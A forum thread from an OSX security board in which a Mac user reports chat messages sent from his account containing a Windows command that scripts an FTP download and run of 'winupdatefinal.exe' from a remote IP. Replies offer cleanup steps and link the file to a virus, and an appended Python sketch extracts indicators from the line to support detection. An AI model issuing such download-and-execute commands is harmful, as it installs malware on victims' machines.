Discuss [PANIC] Possible Security Breach at the OSX Security - Hackint0sh.org; ...
  1. #1

    [PANIC] Possible Security Breach

    So earlier this morning I was watching TV while my MacBook Pro was up and running in my bedroom. When I got back to it a classmate was messaging me through Adium, and to my surprise I WAS AUTOMATICALLY ANSWERING him. Well, not quite answering, but there were 3 lines "I wrote" to him; they were as follows:

    %systemroot%system32cmd.exe

    del eq/echo open 201.75.69.44 6992 :: eq/echo user 9894 4767 :: eq /echo get winupdatefinal.exe :: eq /echo quit :: eq /ftp 'n 'seq /winupdatefinal.exe /del eq

    j

    For your consideration, my active sharing services were:
    screen sharing
    file sharing
    web sharing
    ssh
    bluetooth sharing

    Also, I have noticed that since yesterday Spotlight has gone insane indexing my hard drives, but I hardly think it's related to this "attack".

    Question is: am I in danger?
    I'd appreciate some clues on what's going on with my Mac.
    Thanks in advance,



  2. #2

    I think it's safe to say that this is the result of someone gaining access to your system, either via screen sharing or iChat. Are you on a wireless network? What's your encryption? If it's WPA2, great, but are you allowing guest access and is your password more than 10 characters?

    I would immediately disconnect from whatever network you're on, turn AirPort OFF, and run Disk Utility from Finder/Applications/Utilities/Disk Utility, choosing Macintosh HD from the left column, then click Repair Disk.
    After that, I would delete all preferred networks, and change your network access information from either AirPort Utility if you have an Apple router, or from your router's software if it's 3rd party!

    This is not something I have ever seen happen as a result of the OS itself acting up. Sorry and good luck!

  3. #3
    JayBird


    Sounds like a s/breach. Have you checked the IP against WHOIS: Whois record for 201.75.69.44 - it's an IP in Brazil. The port it is using is used by many P2P apps such as LIMEWIRE.

    When searching Google for the EXE you mentioned: it IS LINKED TO A VIRUS:

    winupdate.exe problem - Viruses, Spyware and other Nasties

    You can normally tell if a virus is present; it will masquerade as a normal file.
    I Do Not Condone Piracy, If You Like It BUY IT! - It's Ok To Test But Not Steal - MacBook Pro Owner

    iPhone Owner 3G
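
For triage, the line pasted in the first post can be split into the indicators the last reply looks up (IP, port, file name). The sketch below is an added example, not part of the original thread; the function names are hypothetical, and it assumes each `echo ...` fragment carries one FTP client command, as in the pasted text.

```python
import ipaddress
import re

# Second line found typed into the Adium window, copied verbatim from the
# first post (separators arrived garbled as "::" and "/").
OBSERVED = ("del eq/echo open 201.75.69.44 6992 :: eq/echo user 9894 4767 :: "
            "eq /echo get winupdatefinal.exe :: eq /echo quit :: eq "
            "/ftp 'n 'seq /winupdatefinal.exe /del eq")

# Assumption: every "echo <verb> <args>" fragment is one FTP client command.
ECHO_RE = re.compile(r"echo\s+(open|user|get|quit)\b([^:/]*)", re.IGNORECASE)


def extract_indicators(text):
    """Return host, port, login pair and requested file names found in text."""
    found = {"host": None, "port": None, "user": None,
             "password": None, "files": []}
    for match in ECHO_RE.finditer(text):
        verb = match.group(1).lower()
        args = match.group(2).split()
        if verb == "open" and args:
            try:
                found["host"] = str(ipaddress.ip_address(args[0]))
            except ValueError:
                found["host"] = args[0]  # hostname rather than an IP literal
            if len(args) > 1 and args[1].isdigit() and 0 < int(args[1]) < 65536:
                found["port"] = int(args[1])
        elif verb == "user" and args:
            found["user"] = args[0]
            found["password"] = args[1] if len(args) > 1 else None
        elif verb == "get":
            found["files"].extend(args)
    return found


def looks_like_windows_payload(text):
    """True when text has Windows-only markers plus an FTP fetch of an .exe."""
    info = extract_indicators(text)
    marker = re.search(r"%systemroot%|cmd\.exe|\.exe\b", text, re.IGNORECASE)
    return bool(marker and info["host"]
                and any(f.lower().endswith(".exe") for f in info["files"]))
```

The extracted host, port and file name are the values to check against WHOIS, firewall logs and antivirus references, as the last reply does by hand.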

 

 
